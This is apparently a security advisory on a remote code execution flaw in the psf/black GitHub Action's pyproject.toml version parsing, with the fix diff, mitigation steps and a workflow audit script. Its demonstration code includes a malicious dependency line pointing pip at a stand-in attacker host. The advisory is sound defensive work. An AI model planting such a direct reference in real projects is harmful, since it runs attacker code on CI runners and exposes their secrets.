CVE Reports

Originally published at cvereports.com

GHSA-V53H-F6M7-XCGM: Remote Code Execution in psf/black GitHub Action via pyproject.toml

Vulnerability ID: GHSA-V53H-F6M7-XCGM
CVSS Score: 8.7
Published: 2026-03-07

A high-severity Remote Code Execution (RCE) vulnerability exists in the official GitHub Action for the Black Python code formatter (psf/black). It stems from improper input validation in the Action's version-parsing logic, which reads the Black requirement out of pyproject.toml when use_pyproject is enabled. The regex that extracts the version specifier accepts anything that follows the name black as long as it starts with a non-alphanumeric character, so a PEP 508 direct reference such as black @ https://... is captured whole and appended verbatim to the underlying pip install command. pip then downloads and builds the attacker-supplied package, and that build code runs on the GitHub Actions runner with the tokens and secrets available to the job, which is enough to compromise a CI/CD pipeline end to end.

TL;DR

The psf/black GitHub Action is vulnerable to RCE when use_pyproject is enabled. An attacker who can change pyproject.toml, for example in a Pull Request, declares black as a PEP 508 direct reference to a URL they control; the Action hands that string unchanged to pip install, which fetches and builds the attacker's package and so runs arbitrary code on the runner. The code gets whatever the triggering job has: its GITHUB_TOKEN and any secrets exposed to it. Note that a plain pull_request run from a fork receives a read-only token and no repository secrets by default, whereas pull_request_target workflows and runs on pushed branches do not have that limit, so the blast radius depends on how the workflow is triggered.


⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-20
  • Attack Vector: Network
  • CVSS Score: 8.7 (High)
  • Affected Component: action/main.py
  • Exploit Status: Proof of Concept Available
  • Impact: Remote Code Execution

Affected Systems

  • GitHub Actions workflows using psf/black
  • Workflows that set use_pyproject: true, so the Action derives the Black version from pyproject.toml
  • psf/black GitHub Action: all revisions before commit 0a2560b (fixed in commit 0a2560b)

Code Analysis

Commit: 0a2560b

Fixed vulnerable version parsing regex in action/main.py

- BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)
+ BLACK_VERSION_RE = re.compile(r"^black((?:\s*(?:~=|==|!=|<=|>=|<|>|===)\s*[A-Za-z0-9*+._-]+)...
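Review bot: the visible prefix of the new pattern requires a version operator immediately after the name, so an entry with extras such as black[jupyter]==24.1.0 no longer matches, whereas the old pattern accepted it because "[" falls inside [^A-Z0-9._-]; either add an explicit extras group or document that extras are unsupported. The anchoring change is the part that matters: the old group [^A-Z0-9._-]+.* swallowed everything after the first non-alphanumeric character, so "black @ https://..." was captured intact and appended to pip install, while the new alternation (~=|==|!=|<=|>=|<|>|===) rejects "@". Because the line is cut off here, confirm that the full pattern still ends in "$" with only comma-separated operator+version clauses allowed before it; otherwise a trailing " @ <url>" or " ; <marker>" after one valid clause would still get through. A stricter alternative is to parse the entry with packaging.requirements.Requirement and refuse any result whose url or marker attribute is set.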

Exploit Details
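
The parsing flaw, as an added worked example that is not code from psf/black or from this report: the vulnerable regex quoted above is run beside a hardened alternative over constructed pyproject.toml dependency lists. The hardened regex, the resolve_black_requirement and is_safe_requirement helpers, and the attacker.example URL are all assumptions made for this illustration; the hardened pattern is modelled on the visible start of the fix but is not the project's own regex, whose full text is cut off on this page.

```python
import re

# Regex as quoted from the vulnerable action/main.py on this page: after the literal
# name "black", any run of non-alphanumeric characters followed by anything at all is
# captured and later appended verbatim to "pip install black...".
VULNERABLE_BLACK_VERSION_RE = re.compile(r"^black([^A-Z0-9._-]+.*)$", re.IGNORECASE)

# Hardened pattern written for this example (an assumption, not the project's fix):
# only PEP 440 clauses (operator + version), optionally comma-separated, are accepted,
# so "@ <url>", environment markers and extras never reach pip.
_CLAUSE = r"\s*(?:===|~=|==|!=|<=|>=|<|>)\s*[A-Za-z0-9*+._-]+"
HARDENED_BLACK_VERSION_RE = re.compile(
    rf"^black((?:{_CLAUSE})(?:\s*,{_CLAUSE})*)?\s*$", re.IGNORECASE
)

# Constructed [project] dependencies lists standing in for pyproject.toml contents;
# in the real Action they come from the repository being formatted.
BENIGN_DEPS = ["requests>=2.31", "black>=24.1.0,<25"]
MALICIOUS_DEPS = [
    "requests>=2.31",
    # PEP 508 direct reference (hypothetical host): pip would download this archive
    # and run its build backend / setup.py on the runner.
    "black @ https://attacker.example/black-24.1.0.tar.gz",
]


def resolve_black_requirement(dependencies, pattern):
    """Return the requirement string the Action would hand to pip install,
    or None when no dependency entry matches the given pattern."""
    for dep in dependencies:
        match = pattern.match(dep.strip())
        if match:
            return "black" + (match.group(1) or "")
    return None


def is_safe_requirement(requirement):
    """True when the string is just the name plus PEP 440 clauses (no '@', ';' or URL)."""
    return HARDENED_BLACK_VERSION_RE.match(requirement) is not None


if __name__ == "__main__":
    for label, deps in (("benign", BENIGN_DEPS), ("malicious", MALICIOUS_DEPS)):
        for name, pattern in (("vulnerable", VULNERABLE_BLACK_VERSION_RE),
                              ("hardened", HARDENED_BLACK_VERSION_RE)):
            req = resolve_black_requirement(deps, pattern)
            print(f"{label:9} {name:10} -> pip install {req!r}")
```

With the vulnerable regex the malicious list yields the full direct reference, which pip interprets as "fetch and build this archive"; with the hardened regex the same entry simply fails to match, so the Action has nothing to install and should abort rather than fall back to an unpinned black.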

Mitigation Strategies

  • Input validation hardening: accept only PEP 440 version specifiers (operator plus version) from pyproject.toml and reject direct references, URLs and markers before anything reaches pip install.
  • Dependency pinning: pin the psf/black action to a full commit SHA that includes the fix rather than a mutable tag or branch, and state the Black version explicitly instead of deriving it from a file a contributor can edit.
  • Least privilege for CI/CD: give the workflow a minimal permissions block and do not expose repository secrets to jobs that run on untrusted pull requests.

Remediation Steps:

  1. Identify all GitHub Actions workflows that use psf/black (search .github/workflows for "uses: psf/black@").
  2. Update the psf/black action to the latest stable release, or pin it to the fix commit 0a2560b981364dde4c8cf8ce9d164c40669a8611.
  3. If updating immediately is not possible, remove use_pyproject: true from the step.
  4. Specify the Black version in the workflow with the version key (e.g., version: "24.1.0") so the pyproject.toml parsing path is never exercised.
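
To carry out the steps above across a repository, here is an added audit script that is not part of the psf/black project or of this report. It scans workflow text for psf/black steps and reports which ref each one uses, whether that ref is a full commit SHA, and whether use_pyproject is switched on in the step's with: block. The two workflow files are constructed for the example; the scan is line-based rather than a real YAML parse, so unusual layouts (flow mappings, anchors) need a YAML library instead.

```python
import re

# Constructed workflow files for this example (not taken from any real repository).
VULNERABLE_WORKFLOW = """\
name: lint
on: [pull_request]
jobs:
  black:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: psf/black@stable
        with:
          use_pyproject: true
"""

REMEDIATED_WORKFLOW = """\
name: lint
on: [pull_request]
permissions:
  contents: read
jobs:
  black:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: psf/black@0a2560b981364dde4c8cf8ce9d164c40669a8611
        with:
          version: "24.1.0"
"""

USES_RE = re.compile(r"^(\s*)-\s*uses:\s*psf/black@(\S+)")
STEP_RE = re.compile(r"^(\s*)-\s")
USE_PYPROJECT_RE = re.compile(r"""^\s*use_pyproject:\s*['"]?true['"]?\s*$""", re.IGNORECASE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text):
    """Return one finding per psf/black step in a workflow file.

    A finding is flagged as needing attention when use_pyproject is enabled, i.e. the
    vulnerable parsing path is reachable. pinned_to_sha is reported alongside because a
    SHA pin still has to be checked by hand against the fix commit; whether a given SHA
    contains the fix cannot be decided offline.
    """
    lines = text.splitlines()
    findings = []
    i = 0
    while i < len(lines):
        m = USES_RE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, ref = len(m.group(1)), m.group(2)
        use_pyproject = False
        j = i + 1
        # Walk the step's own keys until the next list item at the same or shallower
        # indentation starts, which is the next step.
        while j < len(lines):
            s = STEP_RE.match(lines[j])
            if s and len(s.group(1)) <= indent:
                break
            if USE_PYPROJECT_RE.match(lines[j]):
                use_pyproject = True
            j += 1
        findings.append({
            "line": i + 1,
            "ref": ref,
            "pinned_to_sha": bool(FULL_SHA_RE.match(ref)),
            "use_pyproject": use_pyproject,
            "needs_attention": use_pyproject,
        })
        i = j
    return findings


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_WORKFLOW), ("remediated", REMEDIATED_WORKFLOW)):
        for finding in audit_workflow(text):
            print(name, finding)
```

Run it over every file under .github/workflows; any finding with needs_attention set is a step that still reads the Black version from pyproject.toml and should be changed to an explicit version key, and any ref that is not a full SHA should be pinned to a commit at or after the fix.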

